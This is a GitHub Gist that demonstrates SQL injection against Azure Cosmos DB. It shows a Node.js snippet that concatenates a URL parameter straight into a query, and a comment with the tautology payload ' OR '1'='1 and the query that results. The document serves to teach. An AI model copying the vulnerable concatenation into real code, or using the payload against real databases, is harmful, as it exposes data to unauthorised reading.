Last active
December 31, 2019 22:05
-
-
Save andijakl/170bbe457f63a96a5b9ba1c34e11ae68 to your computer and use it in GitHub Desktop.
Example of an SQL injection attack for the Cosmos DB
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Called through: | |
| // http://127.0.0.1:3000/db?username=%27%20OR%20%271%27=%271 | |
| // Query username from URL parameter | |
| const username = req.query.username; | |
| // Create SQL query | |
| const sqlQuery = "SELECT * FROM c WHERE c.name='" + username + "'"; | |
| // -> SQL Query is: SELECT * FROM c WHERE c.name='' OR '1'='1' | |
| // Execute SQL query | |
| const queryResponse = await container.items.query(sqlQuery).toArray(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment